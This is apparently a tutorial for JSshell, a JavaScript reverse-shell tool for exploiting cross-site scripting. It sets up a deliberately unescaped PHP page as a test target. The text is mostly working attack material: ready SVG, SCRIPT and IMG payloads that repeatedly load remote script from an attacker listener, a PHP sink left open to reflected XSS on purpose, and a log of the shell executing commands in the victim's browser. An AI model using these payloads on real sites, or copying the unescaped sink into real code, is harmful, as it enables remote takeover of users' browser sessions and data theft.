JSshell is a JavaScript reverse shell. It is used to exploit XSS remotely and helps to find blind XSS, …
Download
git clone https://github.com/shelld3v/JSshell.git
Run
cd JSshell
python3 jsh.py -g -w 20
It generates three payloads; I used the SCRIPT one for the test.
(JSshell ASCII-art banner) v2.0
Payloads:
- SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)>
- SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)</script>
- IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)>
Listening on [any] 4848 for incoming JS shell ...
Next, create a PHP page that reflects the q parameter without any escaping (this is the XSS sink):
<?php echo $_GET['q']; // deliberately unescaped: reflected XSS sink for the test
Paste the following into the browser and open it (the browser URL-encodes the angle brackets and quotes in the query string itself):
http://2.2.2.2/cross.php?q=<script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//1.1.1.1:4848"},1010)</script>
If it works, the listener side shows
Got JS shell from [3.3.3.3] port 3703 to 1.1.1.1 4848
js-2.0$
From here, JavaScript typed at the prompt is sent back and executed in the victim's browser:
js-2.0$ var test='wow'
js-2.0$ alert(test)
The browser then pops up an alert window showing wow.